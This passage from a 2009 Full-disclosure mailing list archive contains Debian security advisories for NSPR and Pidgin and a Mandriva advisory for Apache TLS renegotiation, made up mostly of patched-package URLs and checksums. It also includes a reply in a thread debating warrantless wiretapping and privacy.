    Size/MD5 checksum:   275458 50b5bf15fe31a8d6668fe018d7062ad8
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_s390.deb
    Size/MD5 checksum:   142530 b9a983def8be1e116f9736564e49162f
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_s390.deb
    Size/MD5 checksum:   295420 f3c3352862c2390f8c03724f77cf1158

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_sparc.deb
    Size/MD5 checksum:   119318 cc152c3f1a1f625bfcbc72ea92cdd953
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_sparc.deb
    Size/MD5 checksum:   266168 55a3913c9d30a8b0c1639e999e4c3582
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_sparc.deb
    Size/MD5 checksum:   253360 d8969537d73b20300591d3d956b5b301


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkr2mCoACgkQXm3vHE4uylrFTwCg6nymwrKwSimPGLn8ez207HND
SJIAn3RWaUVn8pgihlPV24nsTumJtFrX
=TWkT
-----END PGP SIGNATURE-----


From pschmehl_lists at tx.rr.com  Sun Nov  8 01:52:36 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Sat, 07 Nov 2009 19:52:36 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <20091107220642.2615411803D@smtp.hushmail.com>
References: <20091107220642.2615411803D@smtp.hushmail.com>
Message-ID: <7CE01249A8A819D3B136FE04@Macintosh-2.local>

--On November 7, 2009 4:06:42 PM -0600 mikelitoris at hushmail.com wrote:

>
>> But to gather intelligence about what terrorists are up to, even
> if a US citizen is involved, should not require a warrant.
>
> This is all well and good, until the definition of terrorist is
> changed and you become labeled a "terrorist" because your "reason"
> is suddenly counterproductive to someone else's "opinion".  You
> must apply the warrant requirement consistently.  Otherwise, when
> interpretation of the word "terrorist" changes, it affects the
> meaning of the law.

Sure.  I agree with that.  I think it's also important that law 
enforcement activities have much more stringent requirements than military 
intelligence has.  The former is directed toward citizens, the latter 
toward enemies the military has to deal with.

> And call me crazy, but I'm just not willing to
> assume that someone won't abuse the power of being able to surveil
> US citizens and do exactly what Nixon did, spy on their
> competition/detractors.  Surely you can admit that some people do
> things that they wouldn't normally do when big money and big power
> are involved.  After all, "Those who cannot learn from history are
> doomed to repeat it."  Don't be so naive to think it can't happen
> again.
>

Of course.  I've never said they didn't.  In fact I've stated that people 
in government have the same range of motives that people not in government 
have, including the seven deadly sins, if you will.  But I've also pointed 
out that they are not totally evil either, as some seem to think.  There 
are also good people in government just as there are in every other walk 
of life.

>> Intelligence works best in a world of secrecy.
>
> So does deception.  Significantly more so, in fact.
>
>> As I've pointed out now several times, it's analogous to people
> that get all hot and bothered by the fact that admins have access
> to the data on their computers.
>
> Yes, but that computer probably doesn't belong to me but instead to
> my employer.  If it belongs to me, you better have a policy that
> prevents me from using it at work, and/or a login disclaimer
> informing me of your right to monitor what I do if I connect to
> your network.  If not, you better damn well have a warrant if you
> want to take a look at my property.

Therein lies the rub.  Whose property are the bits on the wire?  Once 
you've clicked on send, be it email or im or twitter or whatever, does 
that transmission still belong to you?  I would submit that it does not, 
and that the privacy laws that protect you and your house and belongings 
can no longer be sensibly applied.

Even you send a "private" email, to whom does it belong while it's in the 
process of transmission?

> And as far as I know, there's
> no login disclaimer on the interwebs that allows the government to
> monitor what I do on that network, nor on the telephone, or my
> mobile phone contract.
>

Really?  To whom does your response to me belong?  What about the email 
you send to a friend?  A stranger?  And twitter posts?  Blog comments? 
Etc., etc.  Does it really make sense to extend your privacy rights to 
those things that you have sent into the public domain?  And how do you 
draw the line legally at what the government can look at without a warrant 
and what they must get a warrant for when they can't even know what's on 
the network without first connecting to it to look?  Should we forbid them 
to ever connect simply because something they could potentially see is 
"private"?  And is it really private?

And if they already have a warrant to monitor all communications of a 
known terrorist, what happens when those communications include a US 
person?  All they allowed to monitor since they already have a warrant, 
even though they don't have one for the US person?

>> From what I've read getting a warrant in 72 hours is almost
> impossible.
>
> Ahah!  Now we're on to something.  Here's an idea.  Make it easier
> to get that warrant when you need it.  Improve the process, so that
> when requested, a warrant can be turned around in hours, not days.
> Don't remove the requirement altogether.  That's simply inviting
> trouble.
>

I completely agree.  I also think the definitions need to be much clearer, 
so that intelligence people understand exactly where the fences are.  And 
I don't think a warrant should be required unless a US person is the 
*target* of the monitoring.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From jmm at debian.org  Sun Nov  8 19:47:33 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 8 Nov 2009 20:47:33 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1932-1] New pidgin packages fix
	arbitrary code execution
Message-ID: <20091108194733.GA4465@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1932-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : pidgin
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-3615

It was discovered that incorrect pointer handling in the purple library,
an internal component of the multi-protocol instant messaging client
Pidgin, could lead to denial of service or the execution of arbitrary
code through malformed contact requests.

For the stable distribution (lenny), this problem has been fixed in
version 2.4.3-4lenny5.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.3-1.

We recommend that you upgrade your pidgin package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz
    Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5.diff.gz
    Size/MD5 checksum:    69490 bdf5958352a704f7585d3028cd5e1fec
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5.dsc
    Size/MD5 checksum:     1779 43de978c046520a4919f0d5a12a20726

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny5_all.deb
    Size/MD5 checksum:   158216 5ed3ffcd4e334fc0a111b4009ab833de
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny5_all.deb
    Size/MD5 checksum:  7009600 17672a402481c235f6a2b783b791e746
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny5_all.deb
    Size/MD5 checksum:   193484 3d39086701ad91a11702a2a7c152c6cf
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny5_all.deb
    Size/MD5 checksum:   275870 2f98b47825be3bdd427c0431c62b39be
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny5_all.deb
    Size/MD5 checksum:   133752 0902b80babf5cc2ece1b7768c219535e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_alpha.deb
    Size/MD5 checksum:  1803418 9ca1dbc9edbc3593f73e24f6585ae6c6
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_alpha.deb
    Size/MD5 checksum:   369764 86fba3374b45f8c47f9a1dbd043858b6
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_alpha.deb
    Size/MD5 checksum:  5546018 6b07e1aec08681d8d215fb1058380079
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_alpha.deb
    Size/MD5 checksum:   779324 98b7af086407f89594598b0862b68129

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_amd64.deb
    Size/MD5 checksum:  5678040 dc9abd0e234ce486e977cf507a1a0748
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_amd64.deb
    Size/MD5 checksum:   350246 9bd0d316c59474a803d860d36ffaa677
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_amd64.deb
    Size/MD5 checksum:  1715330 03ce4eee9e2d9ca1065e7ec84d941e86
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_amd64.deb
    Size/MD5 checksum:   729406 c277522dd8c8213fdc79906c37d6247b

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_arm.deb
    Size/MD5 checksum:  5348566 58df4a37d31b6506a456bd8dd86b3ef2
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_arm.deb
    Size/MD5 checksum:   655256 c469023b397f017ebd0433ea85acee24
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_arm.deb
    Size/MD5 checksum:  1490668 aa8d7c91e49530619312394071fc9fc9
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_arm.deb
    Size/MD5 checksum:   315340 934e28a580a3f9596f04cb3a90a8013c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_hppa.deb
    Size/MD5 checksum:   361310 7918ac74caafb3dda22a4266020e86c5
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_hppa.deb
    Size/MD5 checksum:  5490030 a27a1c817f2895b036fb717f613d6f34
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_hppa.deb
    Size/MD5 checksum:   753982 efda55e1cdadee65f026d96ab4503171
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_hppa.deb
    Size/MD5 checksum:  1827992 64bb7e52aaf538c954039c2456f36d8f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_i386.deb
    Size/MD5 checksum:  5374580 2961a636b7706cacd45fb36f3dea6bd4
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_i386.deb
    Size/MD5 checksum:   326802 9025d6ea09b7f9a02c83749473aa229c
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_i386.deb
    Size/MD5 checksum:   681090 79a25b879aae2ac07db502e42618c88f
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_i386.deb
    Size/MD5 checksum:  1584434 d29f583b78f101d87ed2066385c40599

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_ia64.deb
    Size/MD5 checksum:  2194762 4f259a76294be6db4e2bed1a9273766e
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_ia64.deb
    Size/MD5 checksum:   948280 ab48fbb1d647eec48267a69c143a44f3
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_ia64.deb
    Size/MD5 checksum:   434844 c6d12bbb68ff7e09e344407d54ce948f
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_ia64.deb
    Size/MD5 checksum:  5223762 d492670cd8231a7de5a5ab2825c0a48b

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_mips.deb
    Size/MD5 checksum:  1373342 ebc93647a9ec9747375431c4ba19ded6
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_mips.deb
    Size/MD5 checksum:   654102 92429c957d304b156d3d28c5d25805aa
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_mips.deb
    Size/MD5 checksum:   318434 ac3e2c5ad70e495bdae41c658ef622dd
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_mips.deb
    Size/MD5 checksum:  5656198 7ca75b68fdfb8f8787e48e7427dc4530

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_mipsel.deb
    Size/MD5 checksum:   651076 7ce55a8603d33c35373dc4dfb1d14f56
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_mipsel.deb
    Size/MD5 checksum:  1358570 58e263173578cb1f3a9875191e202e52
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_mipsel.deb
    Size/MD5 checksum:   318378 9fbc28d9902e6a51f0f6b2d2de7e0395
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_mipsel.deb
    Size/MD5 checksum:  5546160 a99d654f53d20fa2fab9066c8fa5a8f7

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_s390.deb
    Size/MD5 checksum:   717584 6badbed0aba6b9d0fbfa039bacd1af79
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_s390.deb
    Size/MD5 checksum:  1646224 7df3d4471515c43083309ab7e1d3547d
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_s390.deb
    Size/MD5 checksum:   358972 29aca9346b345fe3a87f8b952668a7fc
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_s390.deb
    Size/MD5 checksum:  5568182 1e7762fc7d93585ba0e4cfd1c12ae4ff

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny5_sparc.deb
    Size/MD5 checksum:   683166 da381d9384ba652955ac8029edeec6bb
  http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny5_sparc.deb
    Size/MD5 checksum:  5140422 0eaada1c6c85b8287ce2df775b154ac1
  http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny5_sparc.deb
    Size/MD5 checksum:   327798 87a0de96929927f64a66582f8eacd5e0
  http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny5_sparc.deb
    Size/MD5 checksum:  1588172 647ca5e52e7bcb927430b7cceb798b1f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkr3H+8ACgkQXm3vHE4uylrUwACgsh7B5PDcw5KrfeM5wD6STeWz
HUoAoI7/R7a9a15eXVKylm3lG8syhpBV
=ClyS
-----END PGP SIGNATURE-----


From security at mandriva.com  Sun Nov  8 21:20:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Sun, 08 Nov 2009 22:20:00 +0100
Subject: [Full-disclosure] [ MDVSA-2009:295 ] apache
Message-ID: <E1N7FB3-0006bz-4P@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:295
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : apache
 Date    : November 8, 2009
 Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,
           Enterprise Server 5.0, Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability was discovered and corrected in apache:
 
 Apache is affected by SSL injection or man-in-the-middle attacks
 due to a design flaw in the SSL and/or TLS protocols. A short term
 solution was released Sat Nov 07 2009 by the ASF team to mitigate
 these problems. Apache will now reject in-session renegotiation
 (CVE-2009-3555).
 
 Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.
 
 This update provides a solution to this vulnerability.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
 http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 bb7817c8fd6d45007367f738772a6bf3  2009.0/i586/apache-base-2.2.9-12.5mdv2009.0.i586.rpm
 f8726194a60735e448281060ae4b36da  2009.0/i586/apache-devel-2.2.9-12.5mdv2009.0.i586.rpm
 fbe7be6f33026519e367e66e0b562340  2009.0/i586/apache-htcacheclean-2.2.9-12.5mdv2009.0.i586.rpm
 138023055641f45f4a164e7c971a6a09  2009.0/i586/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.i586.rpm
 5e688241469d2d4e99f5fd1dac76fa2f  2009.0/i586/apache-mod_cache-2.2.9-12.5mdv2009.0.i586.rpm
 467f3e03bb9523d213e34310be245005  2009.0/i586/apache-mod_dav-2.2.9-12.5mdv2009.0.i586.rpm
 c19b8084698b3aab5e04c8e398105b64  2009.0/i586/apache-mod_dbd-2.2.9-12.5mdv2009.0.i586.rpm
 6c387d03bcf96be55e5668d06468961a  2009.0/i586/apache-mod_deflate-2.2.9-12.5mdv2009.0.i586.rpm
 e349b4f55aa3d804295c70b9bddc923d  2009.0/i586/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.i586.rpm
 3a0aca578f2caf6bd6fde3b4ea2d3d3a  2009.0/i586/apache-mod_file_cache-2.2.9-12.5mdv2009.0.i586.rpm
 ae1cd7db54f7858dcd3cf46316fac109  2009.0/i586/apache-mod_ldap-2.2.9-12.5mdv2009.0.i586.rpm
 6d253c599f47f2aa5f872939bd685880  2009.0/i586/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.i586.rpm
 df04a63519e442a6c5b1c1a5dc166dce  2009.0/i586/apache-mod_proxy-2.2.9-12.5mdv2009.0.i586.rpm
 0ee61ddcc9ba15f27105ac6e40b33feb  2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.i586.rpm
 85bd2fd587538304570dda2ee99997c5  2009.0/i586/apache-mod_ssl-2.2.9-12.5mdv2009.0.i586.rpm
 d4eb614eb21ae8fcffcd2200808f733d  2009.0/i586/apache-modules-2.2.9-12.5mdv2009.0.i586.rpm
 b14ffea00afa59052bf9fa46d64502d7  2009.0/i586/apache-mod_userdir-2.2.9-12.5mdv2009.0.i586.rpm
 0b50fbd6f26a4215c5a3a6741473f423  2009.0/i586/apache-mpm-event-2.2.9-12.5mdv2009.0.i586.rpm
 84b03ef6c45c982d8e79ae3efa48a039  2009.0/i586/apache-mpm-itk-2.2.9-12.5mdv2009.0.i586.rpm
 f2d3438adfafbbd2916fd68e14ab1a5f  2009.0/i586/apache-mpm-peruser-2.2.9-12.5mdv2009.0.i586.rpm
 81da89c424782750e7f48080b36d7b53  2009.0/i586/apache-mpm-prefork-2.2.9-12.5mdv2009.0.i586.rpm
 3ed1f4255c574b656617d5fe8858067c  2009.0/i586/apache-mpm-worker-2.2.9-12.5mdv2009.0.i586.rpm
 ecbe5b3f18db2406073e54e58a79bebd  2009.0/i586/apache-source-2.2.9-12.5mdv2009.0.i586.rpm 
 702c4ff60f52c7e0576ea5532dddc9e3  2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 71ed1d9246a9412d4da492a3d197540d  2009.0/x86_64/apache-base-2.2.9-12.5mdv2009.0.x86_64.rpm
 2dc2a515c8dc7ed51d0a360689f69bd0  2009.0/x86_64/apache-devel-2.2.9-12.5mdv2009.0.x86_64.rpm
 0e9c6e43d4fed842aed0302bd9a791b1  2009.0/x86_64/apache-htcacheclean-2.2.9-12.5mdv2009.0.x86_64.rpm
 694b5febe352ece3681a78fe727f7509  2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm
 7476323e5873c8069b18eb30a6e083b4  2009.0/x86_64/apache-mod_cache-2.2.9-12.5mdv2009.0.x86_64.rpm
 da79b5a011f779c6d3a2f7e7a05e87ce  2009.0/x86_64/apache-mod_dav-2.2.9-12.5mdv2009.0.x86_64.rpm
 8283a2cce0751f50595b959d4a00fb82  2009.0/x86_64/apache-mod_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm
 ab4b98932e3afd3d93a30929007ac210  2009.0/x86_64/apache-mod_deflate-2.2.9-12.5mdv2009.0.x86_64.rpm
 3e696b66694d83821c393561e1bc263e  2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.x86_64.rpm
 c1fd15eb1469a629af3c532ddfa4367f  2009.0/x86_64/apache-mod_file_cache-2.2.9-12.5mdv2009.0.x86_64.rpm
 62e77f84a029b5b06f97d0c68598b13c  2009.0/x86_64/apache-mod_ldap-2.2.9-12.5mdv2009.0.x86_64.rpm
 f4e7eaac49d05c28b9404b5a90744ade  2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.x86_64.rpm
 9a111de2c5b552a8511ff4a58c6cd8b1  2009.0/x86_64/apache-mod_proxy-2.2.9-12.5mdv2009.0.x86_64.rpm
 978da0f65f1112b8e8f1f506c728b861  2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.x86_64.rpm
 898dcdbe09b70afa7c59ca19e1130084  2009.0/x86_64/apache-mod_ssl-2.2.9-12.5mdv2009.0.x86_64.rpm
 3a96f2129bbde56d1412a074362bb26f  2009.0/x86_64/apache-modules-2.2.9-12.5mdv2009.0.x86_64.rpm
 f80f2d91501d2dcbf4ea6c1eff3ed4ca  2009.0/x86_64/apache-mod_userdir-2.2.9-12.5mdv2009.0.x86_64.rpm
 17c9bb917167139a3b69f7fd5bb5817f  2009.0/x86_64/apache-mpm-event-2.2.9-12.5mdv2009.0.x86_64.rpm
 adf43b31e6fce40e28a03dc225408f90  2009.0/x86_64/apache-mpm-itk-2.2.9-12.5mdv2009.0.x86_64.rpm
 0b1ac1a128b892df681ba5712a6621f1  2009.0/x86_64/apache-mpm-peruser-2.2.9-12.5mdv2009.0.x86_64.rpm
 8fc055280e0c1ef8e7c5758c855b4439  2009.0/x86_64/apache-mpm-prefork-2.2.9-12.5mdv2009.0.x86_64.rpm
 093d7472250b96ef722124e082cba6a5  2009.0/x86_64/apache-mpm-worker-2.2.9-12.5mdv2009.0.x86_64.rpm
 9956109782f361eb6c98dbcce8f42c7a  2009.0/x86_64/apache-source-2.2.9-12.5mdv2009.0.x86_64.rpm 
 702c4ff60f52c7e0576ea5532dddc9e3  2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 94e185add24c4e10121981195c930620  2009.1/i586/apache-base-2.2.11-10.6mdv2009.1.i586.rpm
 7b0c7a2be7dcdd645b7593f63aac6011  2009.1/i586/apache-devel-2.2.11-10.6mdv2009.1.i586.rpm
 f580d6b478eef55019c7f038d3b688ab  2009.1/i586/apache-htcacheclean-2.2.11-10.6mdv2009.1.i586.rpm
 b10871dc531adee1ecff565108c5c6e4  2009.1/i586/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.i586.rpm
 a37da4e13ce3d6e89a3c51b1659d4f92  2009.1/i586/apache-mod_cache-2.2.11-10.6mdv2009.1.i586.rpm
 f4a0ae7521abffef05e7e9f3930b2e5f  2009.1/i586/apache-mod_dav-2.2.11-10.6mdv2009.1.i586.rpm
 6b0408eedde371ac765f77ce6c21c214  2009.1/i586/apache-mod_dbd-2.2.11-10.6mdv2009.1.i586.rpm
 9dc3c4df8071b8bb169404c5569d6f93  2009.1/i586/apache-mod_deflate-2.2.11-10.6mdv2009.1.i586.rpm
 7ad5f4ad2f6670be4a89c0be1783aeea  2009.1/i586/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.i586.rpm
 e695fe99060ffca44c0be14d1cdb04ed  2009.1/i586/apache-mod_file_cache-2.2.11-10.6mdv2009.1.i586.rpm
 819cea0e5f59cd42dce452acd0c0c23a  2009.1/i586/apache-mod_ldap-2.2.11-10.6mdv2009.1.i586.rpm
 c3ffcfa7d92d1fc79267cb0a8f5b2946  2009.1/i586/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.i586.rpm
 a3f647d9b03d0f740473f55095932593  2009.1/i586/apache-mod_proxy-2.2.11-10.6mdv2009.1.i586.rpm
 f9ca6ceda431aaa1d5cf65f81bb74e29  2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.i586.rpm
 8310b77c823aff2f583fa50148f470ff  2009.1/i586/apache-mod_ssl-2.2.11-10.6mdv2009.1.i586.rpm
 2712526500eb75864f53d9abc4ab0e51  2009.1/i586/apache-modules-2.2.11-10.6mdv2009.1.i586.rpm
 2d47c9c2713d57c09dfcc80fe54b2433  2009.1/i586/apache-mod_userdir-2.2.11-10.6mdv2009.1.i586.rpm
 255e720dfd9fa2cd9a44aefd58c6ba44  2009.1/i586/apache-mpm-event-2.2.11-10.6mdv2009.1.i586.rpm
 7425fcb2ea8dd837c5a2354c093e764b  2009.1/i586/apache-mpm-itk-2.2.11-10.6mdv2009.1.i586.rpm
 5bfda50c5f1a6bb0ccb4d3d11c8feb1e  2009.1/i586/apache-mpm-peruser-2.2.11-10.6mdv2009.1.i586.rpm
 44608bdac0bf32c864183440a5aead32  2009.1/i586/apache-mpm-prefork-2.2.11-10.6mdv2009.1.i586.rpm
 e8a4b35f1f1200c04a3dfc29d5613d47  2009.1/i586/apache-mpm-worker-2.2.11-10.6mdv2009.1.i586.rpm
 e94c33087169b55d533b90b45963c6eb  2009.1/i586/apache-source-2.2.11-10.6mdv2009.1.i586.rpm 
 a3d3eace4fc86e7ec9c1e8184d40e8d3  2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 06575f7b7439048b85e0f95479ab6552  2009.1/x86_64/apache-base-2.2.11-10.6mdv2009.1.x86_64.rpm
 09f8979708a230d8573195f5af443ba8  2009.1/x86_64/apache-devel-2.2.11-10.6mdv2009.1.x86_64.rpm
 c5ac4447e3c98a555bf458d842527a8b  2009.1/x86_64/apache-htcacheclean-2.2.11-10.6mdv2009.1.x86_64.rpm
 0ea0c2a44c6490641b0db3bf9f9d7409  2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm
 8230b3bb1aa3bd6e31c9825ed4954010  2009.1/x86_64/apache-mod_cache-2.2.11-10.6mdv2009.1.x86_64.rpm
 7cf8275713a8ea9aaaacd76f978dc542  2009.1/x86_64/apache-mod_dav-2.2.11-10.6mdv2009.1.x86_64.rpm
 e99e0b8f90e0cfb803621d33a71fcc2a  2009.1/x86_64/apache-mod_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm
 ded8e4e2b4890559e15874eb662f92cb  2009.1/x86_64/apache-mod_deflate-2.2.11-10.6mdv2009.1.x86_64.rpm
 cdb3af03ea373fadccd2f7a626b3f78e  2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.x86_64.rpm
 9c4700ffcefc5b647826a6fbff0656d3  2009.1/x86_64/apache-mod_file_cache-2.2.11-10.6mdv2009.1.x86_64.rpm
 122139cc3ce8849b56441f7cc8ef1604  2009.1/x86_64/apache-mod_ldap-2.2.11-10.6mdv2009.1.x86_64.rpm
 8bc5b5f06bc8f8fcf7df33eb4424a232  2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.x86_64.rpm
 f43fd5d1dad41550a7e083d72ae711a8  2009.1/x86_64/apache-mod_proxy-2.2.11-10.6mdv2009.1.x86_64.rpm
 11fb4de40d40787954bff02fcde4e7b9  2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.x86_64.rpm
 b762ddfe0acd03be89a37ee168f79f45  2009.1/x86_64/apache-mod_ssl-2.2.11-10.6mdv2009.1.x86_64.rpm
 10b5baf1b7a17673cc7e313c45b34eca  2009.1/x86_64/apache-modules-2.2.11-10.6mdv2009.1.x86_64.rpm
 8fa6579a4728ea68c20d0d66e870802c  2009.1/x86_64/apache-mod_userdir-2.2.11-10.6mdv2009.1.x86_64.rpm
 3ff5897b6496f0cf1c142a158200f9d3  2009.1/x86_64/apache-mpm-event-2.2.11-10.6mdv2009.1.x86_64.rpm
 7285b05e6050739f199e3ace130adbe7  2009.1/x86_64/apache-mpm-itk-2.2.11-10.6mdv2009.1.x86_64.rpm
 51299d866a14149696c0435e7ec6d3a3  2009.1/x86_64/apache-mpm-peruser-2.2.11-10.6mdv2009.1.x86_64.rpm
 d17d49f4fb7bb986964dcd261c600dee  2009.1/x86_64/apache-mpm-prefork-2.2.11-10.6mdv2009.1.x86_64.rpm
